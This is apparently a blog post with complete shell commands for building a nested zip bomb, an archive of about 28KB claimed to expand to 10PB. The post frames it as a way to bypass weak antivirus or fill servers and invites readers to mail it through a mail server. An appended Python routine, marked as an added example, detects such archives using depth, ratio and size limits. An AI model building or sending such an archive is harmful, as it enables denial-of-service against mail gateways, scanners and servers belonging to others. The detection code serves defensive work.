
Zip Bombs

Zip bombs aren't new. Since the days of bulletin board systems people have been highly compressing implausibly large files and transferring them to target machines to consume resources.

Machines these days can handle much larger files and have ever larger amounts of RAM to process them, but zip bombs can still be very useful to an attacker in bypassing weak antivirus or filling up poorly protected servers. Some antivirus software will try to expand the zip file to scan it, using a lot of resources. Others don't try to expand huge files and simply let them through. Neither of these options really protects us.

There was a zip file going around a year or two ago called 42.zip which expands to about 4.5PB. It's good, but can we do better?

The most efficient thing to compress is a string of 00000000's. So let's start with a GB of nothing.

dd if=/dev/zero bs=1024 count=1048576 

And let's squeeze that as much as possible.

dd if=/dev/zero bs=1024 count=1048576 | zip -9 -q zipbomb.zip -

Now let's make 10 of those zip files and zip them up into a new zip file.

cp zipbomb.zip 0.zip
cp zipbomb.zip 1.zip
cp zipbomb.zip 2.zip
cp zipbomb.zip 3.zip
cp zipbomb.zip 4.zip
cp zipbomb.zip 5.zip
cp zipbomb.zip 6.zip
cp zipbomb.zip 7.zip
cp zipbomb.zip 8.zip
cp zipbomb.zip 9.zip
rm zipbomb.zip
zip -9 -q zipbomb.zip *.zip

Now rinse and repeat that last step 7 times.

That should give you a 28k zip file that contains 10PB of useless data. Yup, that's right, half the size and twice the data. You can check it out here.

I've put my little shell script up on github if you want to take a look.

How do you use it? Well mail it through your mail server and see if it makes it...
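Both scanner behaviours described earlier (expanding everything, or waving huge files through) can be avoided by inspecting the archive against a budget and rejecting it when the budget runs out. The following is an added example, not part of the original post or its shell script: it walks nested zips in memory, and the function name inspect_zip and the limits MAX_DEPTH, MAX_TOTAL_BYTES and MAX_RATIO are assumptions chosen for illustration.

```python
import io
import zipfile

# Assumed policy limits (illustrative values, tune for your gateway).
MAX_DEPTH = 3                        # nested-archive levels we will open
MAX_TOTAL_BYTES = 50 * 1024 * 1024   # expanded bytes allowed per submission
MAX_RATIO = 200                      # declared expanded/compressed ratio per member
CHUNK = 64 * 1024


class ArchiveRejected(Exception):
    """The archive exceeds the inspection policy; quarantine, do not deliver."""


def inspect_zip(data, depth=0, budget=None):
    """Walk a zip and any zips inside it; return expanded bytes or raise."""
    if budget is None:
        budget = [MAX_TOTAL_BYTES]   # one shared counter for every nesting level
    if depth > MAX_DEPTH:
        raise ArchiveRejected("nested more than %d levels deep" % MAX_DEPTH)
    total = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            # Cheap per-member pre-check on the declared sizes. The streaming
            # loop below enforces the cumulative budget across members and levels.
            if info.file_size > MAX_RATIO * max(info.compress_size, 1):
                raise ArchiveRejected("%s: ratio above %d:1" % (info.filename, MAX_RATIO))
            buf = bytearray()
            with zf.open(info) as member:
                for chunk in iter(lambda: member.read(CHUNK), b""):
                    budget[0] -= len(chunk)
                    if budget[0] < 0:
                        raise ArchiveRejected("expanded-size budget exhausted")
                    buf += chunk
            total += len(buf)
            if zipfile.is_zipfile(io.BytesIO(buf)):   # descend into inner archives
                total += inspect_zip(bytes(buf), depth + 1, budget)
    return total
```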
